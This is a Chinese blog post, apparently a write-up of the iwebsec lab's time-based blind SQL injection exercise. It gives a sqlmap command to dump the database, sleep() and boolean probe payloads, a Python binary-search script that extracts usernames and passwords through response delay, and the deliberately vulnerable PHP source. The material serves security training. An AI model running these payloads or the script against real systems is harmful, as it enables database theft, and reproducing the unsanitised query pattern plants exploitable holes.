首页 > 数据库 >iwebsec-sql注入 04 时间延迟型注入

iwebsec-sql注入 04 时间延迟型注入

时间:2023-08-18 19:11:39浏览次数:40  
标签:head 04 时间延迟 mid echo sleep iwebsec 注入

01、题目分析:

三大盲注中的时间型注入,当查询语句正常的时候,不会有什么返回值或者回显,唯一的特征就是可以通过sleep函数来判断sql语句是否正确,也就是说,当有办法能判断输入语句是否正确的时候,步骤就和bool盲注一样了,话不多说,直接先让我们伟大的sqlmap跑起来

image

02、sqlmap工具注入:

一把梭

python .\sqlmap.py -u "http://www.bdrwmy.cn:8001/sqli/04.php?id=1"  --current-db --dump --batch

image

03、手工注入:

盲注,简单的来讲就是无论你输入什么内容,页面都不会出现错误提示,如果查询结果正确就显示类似查询成功或者其他的,错误就不会显示。所以注入思路其实就是一个个猜,比如数据库名的长度是6个吗,看看是否正确,没显示继续猜,正确就猜数据库名第一个字母是a吗,是b吗......这样一直猜,猜出来数据库名,表名,列名,数据等等

众所周知时间注入比布尔注入耗时更久,因为布尔判断是否正确能快速回显,而时间判断是否正确只能通过页面的加载时间慢了几秒,所以也只提供思路

-- 延迟:
and sleep(1);
and if(1>2,sleep(1),0);
and if(1<2,sleep(1),0);

-- 布尔:
-- 检查数据库名称的长度是否为7
and length(database())=7;
-- 检查数据库名称是否以字母 'p' 开头
and left(database(),1)='p';
-- 检查数据库名称是否以字母 'pi' 开头
and left(database(),2)='pi';
-- 检查数据库名称中的第一个字符是否为 'p'
and substr(database(),1,1)='p';
-- 检查数据库名称中的第二个字符是否为 'i'
and substr(database(),2,1)='i';
-- 检查数据库名称的第一个字符的 ASCII 码是否为 112 ('p' 的 ASCII 码)
and ord(left(database(),1))=112;

04、手工脚本注入:

这个地方直接借用refeng大佬的脚本

暴力破解法:

# @Author:refeng
import requests

url = "http://www.bdrwmy.cn:8001/sqli/04.php?id=1  and "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #爆库
        # payload = f"1=if(ascii(substr((select  database() ),{i},1))>{mid},sleep(2),1) --+"
        #爆表
        # payload = f"1=if(ascii(substr((select  group_concat(table_name) from information_schema.tables where table_schema='iwebsec' ),{i},1))>{mid},sleep(2),1) --+"
        #爆列
        # payload = f"1=if(ascii(substr((select  group_concat(column_name) from information_schema.columns where table_name='user' ),{i},1))>{mid},sleep(2),1) --+"
        #爆数据
        payload = f"1=if(ascii(substr((select  group_concat(concat_ws('~',username,password)) from iwebsec.user ),{i},1))>{mid},sleep(2),1) --+"
        try:
            r = requests.get(url + payload, timeout=0.5)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)


05、代码分析

<?php

require_once('../header.php'); // 引入头部文件
require_once('db.php'); // 引入数据库连接文件
?>
<html>
<head>
    <title>MySQL sleep SQLi</title> // 设置网页标题
</head>
<h2>MySQL sleep SQLi</h2> // 页面标题
<div class="alert alert-success">
    <p>/04.php?id=1 </p> // 提示用户输入参数的示例
</div>
<body>
<?php
if (isset($_GET['id'])) { // 检查是否存在 "id" 参数
    $id = $_GET['id']; // 获取 "id" 参数的值

    // 创建 SQL 查询语句
    $sql = "SELECT * FROM user WHERE id=$id LIMIT 0,1";
    $result = mysql_query($sql); // 执行查询
} else {
    exit(); // 如果不存在 "id" 参数,则终止代码执行
}

if ($result) { // 检查查询结果是否存在
    ?>
    <table class='table table-striped'> // 创建表格
    <?php
    while ($row = mysql_fetch_assoc($result)) {
        echo "<tr>"; // 输出表格行
        // echo "iwebsec";
        echo "</tr>"; // 结束表格行
    }
    echo '<div class="alert alert-success">';
    echo "<p>welcome to iwebsec!!!</p></div>"; // 输出欢迎消息
    echo "</tr>"; // 结束表格行
} else {
    // 输出错误消息
    // echo '<font color= "#FFFFFF">';
    echo '<div class="alert alert-success">';
    echo "<p>welcome to iwebsec!!!</p></div>"; // 输出欢迎消息
    echo "</tr>"; // 结束表格行
    // echo "</font>";
}
?>

标签:head,04,时间延迟,mid,echo,sleep,iwebsec,注入
From: https://www.cnblogs.com/bdrwmy/p/17641395.html

相关文章

  • burpsuite靶场----SQL注入15----oracle的时间盲注
    burpsuite靶场----SQL注入15----oracle的时间盲注靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval正式开始这个和之前的oracle的布尔盲注差不多https://www.cnblogs.com/thebeastofwar/p/17640741.html稍微改一下脚本,因......
  • iwebsec-sql注入 02 字符型注入
    01、题目分析正常来讲的字符型的sql注入,sql语句如下select * from news where id='$id';像这种就可以在注入的传参后面加上一个单引号,然后联合sql语句最后加上注释符--+就行,但是这个网站不行,因为在这个靶场的字符型注入的中的源代码,加入了宽字节过滤,所以正常的字符型注......
  • iwebsec-sql注入 01 数字型注入
    01、题目分析数字型注入的sql语句select * from news where id=$id;最最最常规的,直接注入02、手工注入:先判断有多少列http://www.bdrwmy.cn:8001/sqli/01.php?id=1orderby3--id=-1就是不显示内容http://www.bdrwmy.cn:8001/sqli/01.php?id=-1unionselect1,2,......
  • burpsuite靶场----SQL注入13----oracle的CAST报错注入
    burpsuite靶场----SQL注入13----oracle的CAST报错注入靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based正式开始1.通过在TrackingId=JBhlRizkqfo87Hq8后面添加'和''(两个单引号)猜测是oracle数据库添加'报错,添加''......
  • burpsuite靶场----SQL注入14----oracle的时间盲注test
    burpsuite靶场----SQL注入14----oracle的时间盲注test靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-time-delays正式开始1.进入标签2.抓包3.在TrackingId=BU622TbcJXbso7Wwh后面填上'||pg_sleep(10)--完成任务......
  • burpsuite靶场----SQL注入12----oracle的布尔盲注
    burpsuite靶场----SQL注入12----oracle的布尔盲注靶场地址https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors正式开始1.找到注入点为cookie中的TrackingId2.因为oracle使用||进行连接的所以先判断闭合payload:TrackingId=7zHLwisTii2Zhhp......
  • Prism IoC 依赖注入
    现有2个项目,SinglePageApp是基于Prism创建的WPF项目,框架使用的是Prism.DryIoc,SinglePageApp.Services是C#类库,包含多种服务,下面通过使用Prism中的依赖注入方式,将自定义的服务注册到SinglePageApp项目中。 1.认识Prism中的依赖注入Prism项目中的App继承于PrismAppl......
  • SQL注入中#、--+、--%20、%23的含义
    1.GET请求中这两个可以作为注释使用,来保证使后面的语句不被执行。在url中,如果是get请求,url中的#是用来知道浏览器动作的,对服务器端无效,所以HTTP请求中不包括#,因此使用#闭合无法注释,会报错。而使用--(有个空格)在传输过程中空格也会被忽略,导致无法注释,所以在get请求传参注入时才......
  • 黑客入侵路径之sql注入实践预防
    ​         记得那天晚上大概11点,准备去与周公约会之前。听到手机屏幕发出阵阵“催命”的响声,预感不秒,不知哪个客户的服务器估计中招了。        睡前极其不愿意接到这种电话,接起来的那一刻就意味着晚上估计得熬夜,头上稀疏的毛发,又要跟我闹意见了,它的价值可以......
  • ctfshow-web入门-sql注入-SELECT模块
    title:ctfshow-web入门-sql注入-SELECT模块date:2023-08-1322:06:17categories:web刷题记录description:web171~web172基础知识缺乏的推荐看我的sqli-labs系列web171单引号包裹,思路很简单。先看多少列1'ORDERBY3--+确定三列查看回显1'UNIONSELECT1,2,3--+......